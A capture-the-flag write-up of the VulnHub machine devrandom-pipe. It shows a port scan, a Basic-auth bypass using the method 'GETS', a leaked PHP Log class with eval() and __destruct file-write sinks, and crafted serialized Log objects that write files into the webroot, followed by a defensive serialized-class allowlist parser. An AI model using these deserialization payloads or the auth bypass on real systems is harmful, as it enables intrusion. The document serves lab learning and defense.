
devrandom-pipe

PHP Deserialization VulnHub - Free

https://www.vulnhub.com/entry/devrandom-pipe,124/

Port Scan

$ sudo nmap 192.168.255.0/24 -p- -T4 --min-rate=10000 -sCV

Nmap scan report for 192.168.255.143
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|   256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
|_  256 7b:00:f7:dc:31:24:18:cf:e4:0a:ec:7a:32:d9:f6:a2 (ED25519)
80/tcp    open  http    Apache httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=index.php
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          32913/udp   status
|   100024  1          34859/tcp   status
|   100024  1          41533/tcp6  status
|_  100024  1          51307/udp6  status
34859/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:DC:FF:3D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web APP

Visiting port 80 prompts for HTTP Basic credentials (realm index.php).


Sending the request with the non-standard method GETS instead of GET gets past the Basic auth prompt.


scriptz/php.js contains a serialize() function, a JavaScript port of PHP's serialize() that emits the same format.


log.php.BAK (a backup copy of the Log class used by the application):

<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
        $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
        $now = date('Y-m-d H:i:s');

        // $str is single-quoted, so the variables are only expanded by the
        // eval() below, which interpolates $this->data into PHP source.
        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
        // Runs when an unserialized Log object is destroyed: both the path
        // and the contents come straight from the object's properties.
        file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>
<script>
function submit_form() {
    var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'});
    // Drop the leading "a:4:" and re-label the serialized array as an Info object.
    object = object.substr(object.indexOf("{"), object.length);
    object = "O:4:\"Info\":4:" + object;
    document.forms[0].param.value = object;
    document.getElementById('info_form').submit();
}
</script>
serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'}); 

a:4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

serialize({filename:'/var/www/html/scriptz/hi.txt', data:'TheTreacheryofImages'})

'a:2:{s:8:"filename";s:28:"/var/www/html/scriptz/hi.txt";s:4:"data";s:20:"TheTreacheryofImages";}'

O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/hi.txt";s:4:"data";s:20:"TheTreacheryofImages";}

O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/Meh1.txt";s:4:"data";s:12:"HighOnCoffee";}
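An added defensive check, not part of this write-up or the VM: a minimal parser for the PHP serialize() format that php.js emits, which lists every class a submitted param would instantiate so a handler (or a log-review script) can reject anything but the expected class. It covers only the types used on this page (i, s, a, O); the function names find_objects and is_allowed are my own.

```python
def _parse(s: bytes, pos: int):
    """Parse one value at s[pos]; return (value, offset just past it).
    Arrays become dicts, objects become (class_name, props) tuples."""
    t = s[pos:pos + 1]
    if t == b'i':                                    # i:1;
        end = s.index(b';', pos)
        return int(s[pos + 2:end]), end + 1
    if t == b's':                                    # s:LEN:"bytes";  LEN counts bytes
        colon = s.index(b':', pos + 2)
        n, start = int(s[pos + 2:colon]), colon + 2
        if s[start + n:start + n + 2] != b'";':      # PHP's unserialize() fails on a bad LEN too
            raise ValueError(f'string length mismatch at offset {pos}')
        return s[start:start + n].decode(), start + n + 2
    if t in (b'a', b'O'):                            # a:COUNT:{...}  O:LEN:"Class":COUNT:{...}
        colon, cls = s.index(b':', pos + 2), None
        if t == b'O':
            cls = s[colon + 2:colon + 2 + int(s[pos + 2:colon])].decode()
            pos = colon + len(cls.encode()) + 2      # closing quote; COUNT starts at pos + 2
            colon = s.index(b':', pos + 2)
        count, cur, props = int(s[pos + 2:colon]), colon + 2, {}
        for _ in range(count):                       # members are key;value pairs
            key, cur = _parse(s, cur)
            props[key], cur = _parse(s, cur)
        if s[cur:cur + 1] != b'}':
            raise ValueError(f'unterminated container at offset {cur}')
        return ((cls, props) if cls is not None else props), cur + 1
    raise ValueError(f'unsupported type {t!r} at offset {pos}')

def find_objects(payload: str) -> list:
    """Return every (class_name, props) the payload would instantiate, outermost first."""
    raw = payload.encode()
    value, end = _parse(raw, 0)
    if end != len(raw):                              # reject anything not fully accounted for
        raise ValueError('trailing data after serialized value')
    found = []
    def walk(v):
        if isinstance(v, tuple):                     # (class_name, props)
            found.append(v)
            v = v[1]
        for item in (v.values() if isinstance(v, dict) else ()):
            walk(item)
    walk(value)
    return found

def is_allowed(payload: str, allowed_classes=()) -> bool:
    """True only if every class in the payload is expected; malformed input is rejected."""
    try:
        return all(cls in allowed_classes for cls, _ in find_objects(payload))
    except ValueError:
        return False
```

Run against the Log payload above, find_objects reports the class name and the filename/data properties it would hand to __destruct, and is_allowed rejects it unless "Log" is explicitly expected.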
